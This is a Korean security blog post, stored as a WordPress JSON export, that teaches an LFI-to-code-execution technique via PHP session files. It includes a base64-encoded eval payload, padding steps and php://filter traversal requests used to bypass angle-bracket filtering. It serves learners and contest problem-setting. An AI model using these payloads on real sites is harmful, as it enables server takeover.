\uac1c\uc694
\nlfi\ub294 local file include \uc758 \uc904\uc784\ub9d0\ub85c \uacf5\uaca9\uc790\uac00 \uc6d0\ud558\ub294 \ud30c\uc77c\uc744 include \uc2dc\ud0b4\uc73c\ub85c\uc368 \uc18c\uc2a4\ucf54\ub4dc\ub97c leak\ud558\uac70\ub098 \uc784\uc758\uc758 \ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ud0a4\ub294\uac83\uc774 \ubaa9\uc801\uc774\ub2e4.
\ninclude\ub97c \ud1b5\ud574 \uc6d0\ud558\ub294 \ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ud0a4\ub824\uba74 payload\uac00 \ub2f4\uae34 \ud30c\uc77c\uc774 \uc11c\ubc84\ub0b4\uc5d0 \uc788\uc5b4\uc57c \ud55c\ub2e4.
\n( \uc11c\ubc84 \uc678\ubd80\uc5d0 \uc788\ub2e4\uba74 remote file include \uacf5\uaca9\uc73c\ub85c \ubd84\ub958\ud558\uba70 \ud574\ub2f9 \uae30\ubc95\uc740 \uc11c\ubc84 \uc124\uc815\uc744 \uc2ec\ud558\uac8c \ud0c4\ub2e4. )
\n\/proc\/self\/environ, access_log, error_log \ub4f1 \ub2e4\uc591\ud55c \ubc29\ubc95\uc774 \uc81c\uc2dc\ub418\uc5c8\uc73c\ub098 \uad8c\ud55c, \uc14b\ud305\ub4f1\uc758 \uc774\uc288\ub85c \uc131\uacf5\ub960\uc774 \ud76c\ubc15\ud574 \uc88b\uc740 \ub300\uc548\uc774 \ub418\uc9c0 \ubabb\ud55c\ub2e4.<\/p>\n
\uc5ec\uae30\uc11c session\ud30c\uc77c\uc744 include\ud558\ub294 \ubc29\ubc95\uc774 \ub4f1\uc7a5\ud55c\ub2e4.
\n\uc2e4\ud589\uc2dc\ud0a4\uace0\uc790 \ud558\ub294 payload\ub97c \uc544\uc774\ub514\ub85c \ud68c\uc6d0\uac00\uc785, \ub85c\uadf8\uc778\uc744 \ud574 \uacf5\uaca9\uc790\uc758 \uc138\uc158\ud30c\uc77c\uc5d0 payload\ub97c \ub2f4\uace0 lfi \ucde8\uc57d\uc810\uc744 \ud1b5\ud574 \uc2e4\ud589\ud558\ub294 \ubc29\ubc95\uc774\ub2e4.
\n\uc774 \uacf5\uaca9\uc758 \uc7a5\uc810\uc740 \uc138\uc158\ud30c\uc77c\uc774 \uc800\uc7a5\ub418\ub294 \uacbd\ub85c\uc758 default\uac12\uc740 \uacbd\uc6b0\uc758 \uc218\uac00 \ub9ce\uc9c0 \uc54a\uc73c\uba70, \ud30c\uc77c \uc774\ub984\uc758 \uaddc\uce59\ub3c4 \ud1b5\uc77c\ub418\uc5b4 \uc788\uc73c\ubbc0\ub85c \uacf5\uaca9\uc758 \uc131\uacf5\ub960\uc774 \ub192\uc544\uc9c4\ub2e4\ub294 \uc810\uc774\ub2e4.
\n( \uc6b0\ubd84\ud22c\uc640 \ub370\ube44\uc548\uc740 \/var\/lib\/php5, \ub808\ub4dc\ud587\uacfc centos\ub294 \/var\/lib\/php\/session, \ud30c\uc77c \uc774\ub984\uc740 \ud56d\uc0c1 sess_{$sessionid} )
\n\ub610\ud55c session\uc744 \uc0ac\uc6a9\ud558\uae30 \uc704\ud574\uc11c\ub294 php \uc5d4\uc9c4\uc774 \uc138\uc158\ud30c\uc77c\uc5d0 \uc811\uadfc\ud560 \uc218 \uc788\uc5b4\uc57c \ud558\ubbc0\ub85c \uad8c\ud55c\uc774\uc288\uc5d0\uc11c\ub3c4 \uc790\uc720\ub86d\ub2e4.
\n\uadf8\ub7ec\ub098 \uc6f9\uc0ac\uc774\ud2b8\uc5d0\uc11c XSS\uacf5\uaca9\uc5d0 \ub300\ud55c \ubc29\uc5b4\uc758 \ubaa9\uc801\uc73c\ub85c input\uac12\uc744 \uac80\uc99d\ud574\uc11c <, > \ub4f1\uc758 \ud2b9\uc218\ubb38\uc790\ub97c html entity\ub85c \uce58\ud658\ud558\ub294 \uacbd\uc6b0\uc5d0 ( \ub9e4\uc6b0 \ud754\ud558\ub2e4 )
\n\uc138\uc158\ud30c\uc77c \ub0b4\uc5d0 angle bracket \uc744 \ub123\uc744 \uc218 \uc5c6\uac8c\ub418\uace0, \ub530\ub77c\uc11c php \ucf54\ub4dc\uc758 \uc2e4\ud589\uc774 \ubd88\uac00\ub2a5\ud574\uc9c4\ub2e4.
\n\uc774\uc81c\ubd80\ud130 \uc704\uc640 \uac19\uc740 \ubc29\uc5b4\uae30\ubc95\uc744 \uc6b0\ud68c\ud558\ub294 \ubc29\ubc95\uc744 \uc18c\uac1c\ud55c\ub2e4.<\/p>\n
[+] \ubcf8\ubb38
\n\ud2b9\uc218\ubb38\uc790\uac00 \ud544\ud130\ub9c1\ub418\uc5b4 \uc788\uc73c\uba74 payload\ub97c base64 encode\ud574\uc11c \ub123\uace0, \uc2e4\ud589\uc2dc\uc5d0 decode\ud558\uba74 \ud544\ud130\ub97c \uc6b0\ud68c\ud560 \uc218 \uc788\ub2e4.
\n\uadf8\ub7ec\ub098 \uc2e4\uc81c \uacf5\uaca9\uacfc\uc815\uc5d0\uc11c \uc5ec\ub7ec issue\uac00 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n
\uc6b0\uc120 \uc138\uc158\ud30c\uc77c\uc740 \uac12\uc744 serailize \ud574\uc11c \uc800\uc7a5\ud55c\ub2e4.
\nuser_id|s:5:”guest”;user_level|s:1:\u201d9\u201d; \uc640 \uac19\uc740 \ud615\uc2dd\uc774\ub2e4.
\nbase64 decode \uc54c\uace0\ub9ac\uc998\uc740 4\ubc14\uc774\ud2b8\ub97c \uc798\ub77c 3\ubc14\uc774\ud2b8\ub85c \ub9cc\ub4e4\uc5b4\uc8fc\ub294\ub370 payload\uc758 \uc55e\uc5d0 \uba87\ubc14\uc774\ud2b8\uc758 \ubd88\ud544\uc694\ud55c string\uc774 \ub4e4\uc5b4\uc788\ub294\uc9c0 \ubaa8\ub978\ub2e4.
\nXXXXaGVsbG8= \ub97c base64 decode\ud558\uba74 ]u\u00d7hello \uc9c0\ub9cc,
\nXXXXXaGVsbG8= \ub97c base64 decode\ud558\uba74 ]u\u00d7]\u00a1\u2022\u00b1\u00b1\u00bc \ub77c\ub294 \uad34\uc0c1\ud55c \uac12\uc774 \ub098\uc624\ub294 issue\uac00 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub2e4. ( \ube44\ub8e8\ud55c \ud544\ub825\ud0d3\uc5d0 \ub9d0\uc774 \uad34\uc0c1\ud55c\ub370 \uc801\ub2f9\ud788 \uc774\ud574\ud558\uc790. )
\n\uadf8\ub7ec\ubbc0\ub85c base64 decode\ub97c \ud558\uc9c0 \uc54a\uace0 plaintext\ub97c \ucd9c\ub825\uc2dc\ucf1c \ud398\uc774\ub85c\ub4dc \uc55e\uc758 string\uc774 4\uc758 \ubc30\uc218\uc778\uc9c0 \ud655\uc778\ud574\uc57c \ud55c\ub2e4.
\n4\uc758 \ubc30\uc218\uac00 \uc544\ub2c8\ub77c\uba74 payload \uc55e\uc5d0 padding\uc744 \ud574\uc918\uc11c 4\uc758 \ubc30\uc218\uac00 \ub418\ub3c4\ub85d \ub9de\ucdb0\uc57c\ud55c\ub2e4.<\/p>\n
\ub610\ud55c \uac12\uc744 write\ud55c \uc138\uc158\uacfc \ubcc4\ub3c4\uc758 \uc138\uc158\uc744 \uc0ac\uc6a9\ud574 include\ub97c \ud574\uc57c\ud55c\ub2e4.
\nphp\uc5d0\uc11c session\uc744 \uc0ac\uc6a9\ud560 \uacbd\uc6b0\uc5d0 php \ucf54\ub4dc\uac00 \uc2e4\ud589\ub418\ub294 \ub3d9\uc548 \uc138\uc158\ud30c\uc77c\uc744 \uc5f4\uace0\uc788\uac8c \ub41c\ub2e4.
\n\ub530\ub77c\uc11c \uc790\uc2e0\uc758 \uc138\uc158\ud30c\uc77c\uc744 include\ud558\ub824\uace0 \ud558\uba74 php\ucf54\ub4dc\uac00 \uc2dc\uc791\ud558\uc790\ub9c8\uc790 \ub0b4 \uc138\uc158\ud30c\uc77c\uc744 \uc5f4\uac8c\ub418\uace0, include\ud558\ub294 \ub77c\uc778\uc5d0\uc11c \ud30c\uc77c\uc744 \uc77d\uc744 \uc218 \uc5c6\uac8c\ub41c\ub2e4.
\n\uadf8\ub7ec\ub2c8 A\uc138\uc158\uc5d0 payload\ub97c \uc62c\ub824\ub450\uace0 B\uc138\uc158\uc5d0\uc11c A\uc758 \uc138\uc158\ud30c\uc77c\uc744 \uc77d\ub3c4\ub85d \ud574\uc57c\ud55c\ub2e4.<\/p>\n
[+] exploit<\/p>\n
\uc784\uc758\uc758 \uac12\uc73c\ub85c \ud68c\uc6d0\uac00\uc785, \ub85c\uadf8\uc778 \ud6c4\uc5d0 \uc138\uc158\ud30c\uc77c\uc744 include\ud55c\ub2e4.
\npage=php:\/\/filter\/convert.base64-decode\/resource=..\/..\/..\/..\/..\/..\/tmp\/sess_a<\/p>\n
\uc544\ub798\uc640 \uac19\uc740 \uac12\uc774 \ucd9c\ub825 \ub420 \uac83\uc774\ub2e4.
\nuser_name|s:5:”user1″;<\/p>\n
\uc5ec\uae30\uc11c \uc6b0\ub9ac\uac00 \uc870\uc791 \uac00\ub2a5\ud55c \ubd80\ubd84\uc740 \ube68\uac04\uc0c9\uc758 user1 \uc774\ubbc0\ub85c \uadf8 \uc55e\uc758 \uac12 user_name|s:5:” \uac00 4\uc758 \ubc30\uc218\uc778\uc9c0 \ud655\uc778\ud55c\ub2e4.
\n4\uc758 \ubc30\uc218\uac00 \uc544\ub2c8\ub77c\uba74 \uba87\ubc14\uc774\ud2b8\uc758 \ud328\ub529\uc744 \ud574\uc57c\ud558\ub294\uc9c0 \uacc4\uc0b0\ud55c\ub2e4.<\/p>\n
A\uc138\uc158\uc5d0\uc11c padding + PD89ZXZBTCAJKCAJJGF6QUEJKSAJCSA7ID8+ \uc758 \uac12\uc73c\ub85c \ud68c\uc6d0\uac00\uc785, \ub85c\uadf8\uc778\uc744 \ud55c\ub2e4.
\n \uac00\ub054 userid\ub97c uppercase\ud558\ub294 \uacbd\uc6b0\ub3c4 \uc788\ub294\ub370 \uc774\ub7f0 \uacbd\uc6b0\uc5d0 decode\ub41c \uac12\uc774 \uc804\ud600 \ub2ec\ub77c\uc9c0\ubbc0\ub85c \ucc98\uc74c\ubd80\ud130 \ub300\ubb38\uc790\ub85c payload\ub97c \uc791\uc131\ud574 \ubcf4\uc558\ub2e4.
\n + \uae4c\uc9c0 \ud544\ud130\ub9c1 \ub418\uc5b4\uc788\uc744 \uacbd\uc6b0 \ud639\uc740 \uc18c\ubb38\uc790\ub9cc \uc0ac\uc6a9\ud574\uc57c\ud558\ub294 \uacbd\uc6b0\uc5d0\ub3c4 \uc57d\uac04\uc758 \ub178\ub825 \ud639\uc740 \ucf54\ub529\uc744 \ud1b5\ud574 \ud398\uc774\ub85c\ub4dc\ub97c \uc791\uc131\ud560 \uc218 \uc788\uc744\uac83\uc774\ub2e4.<\/p>\n
B\uc138\uc158\uc5d0\uc11c \ud574\ub2f9 \ud30c\uc77c\uc744 include\ud55c\ub2e4.
\npage=php:\/\/filter\/convert.base64-decode\/resource=..\/..\/..\/..\/..\/..\/tmp\/sess_a&azAA=phpinfo();<\/p>\n
[+] \ub9c8\ubb34\ub9ac
\n\ud574\ub2f9 \uae30\ubc95\uc740 \ub9c9\uc5f0\ud55c \uc544\uc774\ub514\uc5b4\ub9cc \uac00\uc9c0\uace0 \uc788\ub2e4\uac00 \uba87\uc8fc\uc804\uc5d0 \ubaa8 \ub300\ud68c \ubb38\uc81c\ub97c \ucd9c\uc81c\ud558\uba74\uc11c \ucc98\uc74c\uc73c\ub85c \uad6c\ud604\ud574\ubcf4\uc558\ub2e4.
\n\uac1c\ub150\uc740 \ub2e8\uc21c\ud558\uc9c0\ub9cc \uc2e4\uc81c \uacf5\uaca9\uacfc\uc815\uc5d0\uc11c \uc5c4\uccad\ub09c \uc774\uc288\uac00 \ubc1c\uc0dd\ud574 \ub9ce\uc740 \uba58\ubd95\uc744 \uc720\ubc1c\ud588\ub2e4.
\n\ub2e8\uc21c\ud55c \uac1c\ub150 \uc124\uba85\ub9cc \uc801\uc5b4\ub193\uc558\ub2e4\uac00\ub294 lfi\ub97c \ucc98\uc74c \uacf5\ubd80\ud558\ub294 \uc0ac\ub78c\ub4e4\uc774 \ub530\ub77c\ud558\uae30 \ud798\ub4dc\ub9ac\ub77c \uc0dd\uac01\ud574 \ucd5c\ub300\ud55c \uc790\uc138\ud788 \uc801\uc5b4\ubcf4\uc558\ub2e4.<\/p>\n","protected":false},"excerpt":{"rendered":"
\uac1c\uc694 lfi\ub294 local file include \uc758 \uc904\uc784\ub9d0\ub85c \uacf5\uaca9\uc790\uac00 \uc6d0\ud558\ub294 \ud30c\uc77c\uc744 include \uc2dc\ud0b4\uc73c\ub85c\uc368 \uc18c\uc2a4\ucf54\ub4dc\ub97c leak\ud558\uac70\ub098 \uc784\uc758\uc758 \ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ud0a4\ub294\uac83\uc774 \ubaa9\uc801\uc774\ub2e4. include\ub97c \ud1b5\ud574 \uc6d0\ud558\ub294 \ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ud0a4\ub824\uba74 payload\uac00 \ub2f4\uae34 \ud30c\uc77c\uc774 \uc11c\ubc84\ub0b4\uc5d0 \uc788\uc5b4\uc57c \ud55c\ub2e4. ( \uc11c\ubc84 \uc678\ubd80\uc5d0 \uc788\ub2e4\uba74 remote file include \uacf5\uaca9\uc73c\ub85c \ubd84\ub958\ud558\uba70 \ud574\ub2f9 \uae30\ubc95\uc740 \uc11c\ubc84 \uc124\uc815\uc744 \uc2ec\ud558\uac8c \ud0c4\ub2e4. ) \/proc\/self\/environ, access_log, error_log \ub4f1 \ub2e4\uc591\ud55c \ubc29\ubc95\uc774 \uc81c\uc2dc\ub418\uc5c8\uc73c\ub098 \uad8c\ud55c, \uc14b\ud305\ub4f1\uc758 \uc774\uc288\ub85c \uc131\uacf5\ub960\uc774 \ud76c\ubc15\ud574 \uc88b\uc740 \ub300\uc548\uc774 \ub418\uc9c0 \ubabb\ud55c\ub2e4. \uc5ec\uae30\uc11c session\ud30c\uc77c\uc744 include\ud558\ub294 \ubc29\ubc95\uc774 \ub4f1\uc7a5\ud55c\ub2e4. \uc2e4\ud589\uc2dc\ud0a4\uace0\uc790 \ud558\ub294 payload\ub97c \uc544\uc774\ub514\ub85c \ud68c\uc6d0\uac00\uc785, \ub85c\uadf8\uc778\uc744 \ud574 \uacf5\uaca9\uc790\uc758 \uc138\uc158\ud30c\uc77c\uc5d0 payload\ub97c \ub2f4\uace0 lfi \ucde8\uc57d\uc810\uc744 \ud1b5\ud574 \uc2e4\ud589\ud558\ub294 \ubc29\ubc95\uc774\ub2e4. \uc774 \uacf5\uaca9\uc758 \uc7a5\uc810\uc740 \uc138\uc158\ud30c\uc77c\uc774 \uc800\uc7a5\ub418\ub294 \uacbd\ub85c\uc758 default\uac12\uc740 \uacbd\uc6b0\uc758 \uc218\uac00 \ub9ce\uc9c0 \uc54a\uc73c\uba70, \ud30c\uc77c \uc774\ub984\uc758 \uaddc\uce59\ub3c4 \ud1b5\uc77c\ub418\uc5b4 \uc788\uc73c\ubbc0\ub85c \uacf5\uaca9\uc758 \uc131\uacf5\ub960\uc774 \ub192\uc544\uc9c4\ub2e4\ub294 \uc810\uc774\ub2e4. ( \uc6b0\ubd84\ud22c\uc640 \ub370\ube44\uc548\uc740 \/var\/lib\/php5, \ub808\ub4dc\ud587\uacfc centos\ub294 \/var\/lib\/php\/session, \ud30c\uc77c \uc774\ub984\uc740 \ud56d\uc0c1 sess_{$sessionid} ) \ub610\ud55c session\uc744 \uc0ac\uc6a9\ud558\uae30 \uc704\ud574\uc11c\ub294 php \uc5d4\uc9c4\uc774 \uc138\uc158\ud30c\uc77c\uc5d0 \uc811\uadfc\ud560 \uc218 \uc788\uc5b4\uc57c \ud558\ubbc0\ub85c \uad8c\ud55c\uc774\uc288\uc5d0\uc11c\ub3c4 \uc790\uc720\ub86d\ub2e4. \uadf8\ub7ec\ub098 \uc6f9\uc0ac\uc774\ud2b8\uc5d0\uc11c XSS\uacf5\uaca9\uc5d0 \ub300\ud55c \ubc29\uc5b4\uc758 \ubaa9\uc801\uc73c\ub85c input\uac12\uc744 \uac80\uc99d\ud574\uc11c \ub4f1\uc758 \ud2b9\uc218\ubb38\uc790\ub97c html entity\ub85c \uce58\ud658\ud558\ub294 \uacbd\uc6b0\uc5d0 ( \ub9e4\uc6b0 \ud754\ud558\ub2e4 ) \uc138\uc158\ud30c\uc77c \ub0b4\uc5d0 angle bracket \uc744 \ub123\uc744 \uc218 \uc5c6\uac8c\ub418\uace0, \ub530\ub77c\uc11c php \ucf54\ub4dc\uc758 \uc2e4\ud589\uc774 \ubd88\uac00\ub2a5\ud574\uc9c4\ub2e4. \uc774\uc81c\ubd80\ud130 \uc704\uc640 \uac19\uc740 \ubc29\uc5b4\uae30\ubc95\uc744 \uc6b0\ud68c\ud558\ub294 \ubc29\ubc95\uc744 \uc18c\uac1c\ud55c\ub2e4. [+] \ubcf8\ubb38 \ud2b9\uc218\ubb38\uc790\uac00 \ud544\ud130\ub9c1\ub418\uc5b4 \uc788\uc73c\uba74 payload\ub97c base64 encode\ud574\uc11c \ub123\uace0, \uc2e4\ud589\uc2dc\uc5d0 decode\ud558\uba74 \ud544\ud130\ub97c \uc6b0\ud68c\ud560 \uc218 \uc788\ub2e4. \uadf8\ub7ec\ub098 \uc2e4\uc81c \uacf5\uaca9\uacfc\uc815\uc5d0\uc11c \uc5ec\ub7ec issue\uac00 \ubc1c\uc0dd\ud55c\ub2e4. \uc6b0\uc120 \uc138\uc158\ud30c\uc77c\uc740 \uac12\uc744 serailize \ud574\uc11c \uc800\uc7a5\ud55c\ub2e4. user_id|s:5:”guest”;user_level|s:1:\u201d9\u201d; \uc640 \uac19\uc740 \ud615\uc2dd\uc774\ub2e4. base64 decode \uc54c\uace0\ub9ac\uc998\uc740 4\ubc14\uc774\ud2b8\ub97c \uc798\ub77c 3\ubc14\uc774\ud2b8\ub85c \ub9cc\ub4e4\uc5b4\uc8fc\ub294\ub370 payload\uc758 \uc55e\uc5d0 \uba87\ubc14\uc774\ud2b8\uc758 \ubd88\ud544\uc694\ud55c string\uc774 \ub4e4\uc5b4\uc788\ub294\uc9c0 \ubaa8\ub978\ub2e4. XXXXaGVsbG8= \ub97c base64 decode\ud558\uba74 ]u\u00d7hello \uc9c0\ub9cc, XXXXXaGVsbG8= \ub97c base64 decode\ud558\uba74 ]u\u00d7]\u00a1\u2022\u00b1\u00b1\u00bc \ub77c\ub294 \uad34\uc0c1\ud55c \uac12\uc774 \ub098\uc624\ub294 issue\uac00 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub2e4. ( \ube44\ub8e8\ud55c \ud544\ub825\ud0d3\uc5d0 \ub9d0\uc774 \uad34\uc0c1\ud55c\ub370 \uc801\ub2f9\ud788 \uc774\ud574\ud558\uc790. ) \uadf8\ub7ec\ubbc0\ub85c base64 decode\ub97c \ud558\uc9c0 \uc54a\uace0 plaintext\ub97c \ucd9c\ub825\uc2dc\ucf1c \ud398\uc774\ub85c\ub4dc \uc55e\uc758 string\uc774 4\uc758 \ubc30\uc218\uc778\uc9c0 \ud655\uc778\ud574\uc57c \ud55c\ub2e4. 4\uc758 \ubc30\uc218\uac00 \uc544\ub2c8\ub77c\uba74 payload \uc55e\uc5d0 padding\uc744 \ud574\uc918\uc11c 4\uc758 \ubc30\uc218\uac00 \ub418\ub3c4\ub85d \ub9de\ucdb0\uc57c\ud55c\ub2e4. \ub610\ud55c \uac12\uc744 write\ud55c \uc138\uc158\uacfc \ubcc4\ub3c4\uc758 \uc138\uc158\uc744 \uc0ac\uc6a9\ud574 include\ub97c \ud574\uc57c\ud55c\ub2e4. php\uc5d0\uc11c session\uc744 \uc0ac\uc6a9\ud560 \uacbd\uc6b0\uc5d0 php \ucf54\ub4dc\uac00 \uc2e4\ud589\ub418\ub294 \ub3d9\uc548 \uc138\uc158\ud30c\uc77c\uc744 \uc5f4\uace0\uc788\uac8c \ub41c\ub2e4. \ub530\ub77c\uc11c \uc790\uc2e0\uc758 \uc138\uc158\ud30c\uc77c\uc744 include\ud558\ub824\uace0 \ud558\uba74 php\ucf54\ub4dc\uac00 \uc2dc\uc791\ud558\uc790\ub9c8\uc790 \ub0b4 \uc138\uc158\ud30c\uc77c\uc744 \uc5f4\uac8c\ub418\uace0, include\ud558\ub294 \ub77c\uc778\uc5d0\uc11c \ud30c\uc77c\uc744 \uc77d\uc744 \uc218 \uc5c6\uac8c\ub41c\ub2e4. \uadf8\ub7ec\ub2c8 A\uc138\uc158\uc5d0 payload\ub97c \uc62c\ub824\ub450\uace0 B\uc138\uc158\uc5d0\uc11c A\uc758 \uc138\uc158\ud30c\uc77c\uc744 \uc77d\ub3c4\ub85d \ud574\uc57c\ud55c\ub2e4. [+] exploit \uc784\uc758\uc758 \uac12\uc73c\ub85c \ud68c\uc6d0\uac00\uc785, \ub85c\uadf8\uc778 \ud6c4\uc5d0 \uc138\uc158\ud30c\uc77c\uc744 include\ud55c\ub2e4. page=php:\/\/filter\/convert.base64-decode\/resource=..\/..\/..\/..\/..\/..\/tmp\/sess_a \uc544\ub798\uc640 \uac19\uc740 \uac12\uc774 \ucd9c\ub825 \ub420 \uac83\uc774\ub2e4. user_name|s:5:”user1″; \uc5ec\uae30\uc11c \uc6b0\ub9ac\uac00 \uc870\uc791 \uac00\ub2a5\ud55c \ubd80\ubd84\uc740 \ube68\uac04\uc0c9\uc758 user1 \uc774\ubbc0\ub85c \uadf8 \uc55e\uc758 \uac12 user_name|s:5:” \uac00 4\uc758 \ubc30\uc218\uc778\uc9c0 \ud655\uc778\ud55c\ub2e4. 4\uc758 \ubc30\uc218\uac00 \uc544\ub2c8\ub77c\uba74 \uba87\ubc14\uc774\ud2b8\uc758 \ud328\ub529\uc744 \ud574\uc57c\ud558\ub294\uc9c0 \uacc4\uc0b0\ud55c\ub2e4. A\uc138\uc158\uc5d0\uc11c padding + PD89ZXZBTCAJKCAJJGF6QUEJKSAJCSA7ID8+ \uc758 \uac12\uc73c\ub85c \ud68c\uc6d0\uac00\uc785, \ub85c\uadf8\uc778\uc744 \ud55c\ub2e4. \uac00\ub054 userid\ub97c uppercase\ud558\ub294 \uacbd\uc6b0\ub3c4 \uc788\ub294\ub370 \uc774\ub7f0 \uacbd\uc6b0\uc5d0 decode\ub41c \uac12\uc774 \uc804\ud600 \ub2ec\ub77c\uc9c0\ubbc0\ub85c \ucc98\uc74c\ubd80\ud130 \ub300\ubb38\uc790\ub85c payload\ub97c \uc791\uc131\ud574 \ubcf4\uc558\ub2e4. + \uae4c\uc9c0 \ud544\ud130\ub9c1 \ub418\uc5b4\uc788\uc744 \uacbd\uc6b0 \ud639\uc740 \uc18c\ubb38\uc790\ub9cc \uc0ac\uc6a9\ud574\uc57c\ud558\ub294 \uacbd\uc6b0\uc5d0\ub3c4 \uc57d\uac04\uc758 \ub178\ub825 \ud639\uc740 \ucf54\ub529\uc744 \ud1b5\ud574 \ud398\uc774\ub85c\ub4dc\ub97c \uc791\uc131\ud560 \uc218 \uc788\uc744\uac83\uc774\ub2e4. B\uc138\uc158\uc5d0\uc11c \ud574\ub2f9 \ud30c\uc77c\uc744 include\ud55c\ub2e4. page=php:\/\/filter\/convert.base64-decode\/resource=..\/..\/..\/..\/..\/..\/tmp\/sess_a&azAA=phpinfo(); [+] \ub9c8\ubb34\ub9ac \ud574\ub2f9 \uae30\ubc95\uc740 \ub9c9\uc5f0\ud55c \uc544\uc774\ub514\uc5b4\ub9cc \uac00\uc9c0\uace0 \uc788\ub2e4\uac00 \uba87\uc8fc\uc804\uc5d0 \ubaa8 \ub300\ud68c \ubb38\uc81c\ub97c \ucd9c\uc81c\ud558\uba74\uc11c \ucc98\uc74c\uc73c\ub85c \uad6c\ud604\ud574\ubcf4\uc558\ub2e4. \uac1c\ub150\uc740 \ub2e8\uc21c\ud558\uc9c0\ub9cc \uc2e4\uc81c \uacf5\uaca9\uacfc\uc815\uc5d0\uc11c \uc5c4\uccad\ub09c \uc774\uc288\uac00 \ubc1c\uc0dd\ud574 \ub9ce\uc740 \uba58\ubd95\uc744 \uc720\ubc1c\ud588\ub2e4. \ub2e8\uc21c\ud55c \uac1c\ub150 \uc124\uba85\ub9cc \uc801\uc5b4\ub193\uc558\ub2e4\uac00\ub294 lfi\ub97c \ucc98\uc74c \uacf5\ubd80\ud558\ub294 \uc0ac\ub78c\ub4e4\uc774 \ub530\ub77c\ud558\uae30 \ud798\ub4dc\ub9ac\ub77c \uc0dd\uac01\ud574 \ucd5c\ub300\ud55c \uc790\uc138\ud788 \uc801\uc5b4\ubcf4\uc558\ub2e4.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/64"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=64"}],"version-history":[{"count":3,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/64\/revisions"}],"predecessor-version":[{"id":67,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/64\/revisions\/67"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=64"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=64"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=64"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}